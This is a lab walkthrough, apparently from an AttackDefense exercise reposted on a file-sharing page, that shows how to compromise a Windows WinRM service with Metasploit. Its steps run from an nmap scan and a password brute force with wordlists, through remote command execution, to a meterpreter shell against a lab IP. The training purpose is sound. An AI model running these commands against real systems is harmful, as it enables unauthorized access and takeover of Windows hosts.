walkthrough-2026.pdf
(
1143 KB
)
Pobierz
Name
URL
Type
WinRM: Exploitation with Metasploit
https://attackdefense.com/challengedetails?cid=2026
Windows Exploitation: Services
Important Note:
This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Step 1:
Run an Nmap scan against the target IP.
Command:
nmap --top-ports 7000 10.0.0.173
Step 2:
We have discovered that winrm server is running on port 5985. By default WinRM
service uses port 5985 for HTTP. We will run the metasploit winmi_login module to find the
valid users and their passwords.
Commands:
msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.0.0.173
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
exploit
We have found the valid password of the administrator user.
Step 3:
Checking WinRM supported authentication method using an auxiliary module.
This is very important to know, before we try to connect to the WinRM service. We need to use
a valid authentication method while connecting to the service. You can find more information
about the authentication from the below link:
https://docs.microsoft.com/en-us/windows/win32/winrm/authentication-for-remote-connections
Commands:
use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS 10.0.0.173
exploit
Target supports two authentication types i.e Basic and Negotiate.
Step 4:
Execute command on the target server using winrm_cmd module.
Commands:
use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS 10.0.0.173
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit
Step 5:
We have successfully executed the command “whoami” on the remote server. Now, we
will use the winrm_exec exploit module to get the meterpreter shell.
Commands:
use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.0.0.173
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
We have gained the meterpreter session.
Step 6:
Find the flag.
Commands:
cd /
dir
Plik z chomika:
kufel_007
Inne pliki z tego folderu:
walkthrough-1410.pdf
(1580 KB)
walkthrough-146.pdf
(1836 KB)
walkthrough-1395.pdf
(923 KB)
walkthrough-150.pdf
(2667 KB)
walkthrough-148.pdf
(1558 KB)
Inne foldery tego chomika:
Week 1
Week 2
Week 3
Week 4
Week 5
Zgłoś jeśli
naruszono regulamin